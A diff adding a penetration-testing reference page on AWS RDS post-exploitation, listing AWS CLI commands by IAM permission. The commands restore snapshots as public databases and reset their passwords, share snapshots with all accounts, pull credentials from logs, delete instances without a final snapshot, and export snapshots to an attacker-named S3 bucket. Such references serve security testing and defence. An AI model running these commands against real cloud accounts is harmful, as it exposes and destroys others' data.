Migrate to using mdbook

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md

@@ -0,0 +1,92 @@
+# AWS - RDS Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## RDS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-relational-database-rds-enum.md
+{{#endref}}
+
+### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
+
+If the attacker has enough permissions, he could make a **DB publicly accessible** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
+
+```bash
+aws rds describe-db-instances # Get DB identifier
+
+aws rds create-db-snapshot \
+    --db-instance-identifier <db-id> \
+    --db-snapshot-identifier cloudgoat
+
+# Get subnet groups & security groups
+aws rds describe-db-subnet-groups
+aws ec2 describe-security-groups
+
+aws rds restore-db-instance-from-db-snapshot \
+    --db-instance-identifier "new-db-not-malicious" \
+    --db-snapshot-identifier <scapshotId> \
+    --db-subnet-group-name <db subnet group> \
+    --publicly-accessible \
+    --vpc-security-group-ids <ec2-security group>
+
+aws rds modify-db-instance \
+    --db-instance-identifier "new-db-not-malicious" \
+    --master-user-password 'Llaody2f6.123' \
+    --apply-immediately
+
+# Connect to the new DB after a few mins
+```
+
+### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
+
+An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot.
+
+If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**.
+
+```bash
+# create snapshot
+aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
+
+# Make it public/share with attackers account
+aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
+## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
+```
+
+### `rds:DownloadDBLogFilePortion`
+
+An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
+
+```bash
+aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
+```
+
+**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.
+
+### `rds:DeleteDBInstance`
+
+An attacker with these permissions can **DoS existing RDS instances**.
+
+```bash
+# Delete
+aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
+```
+
+**Potential impact**: Deletion of existing RDS instances, and potential loss of data.
+
+### `rds:StartExportTask`
+
+> [!NOTE]
+> TODO: Test
+
+An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
+
+```bash
+aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
+```
+
+**Potential impact**: Access to sensitive data in the exported snapshot.
+
+{{#include ../../../banners/hacktricks-training.md}}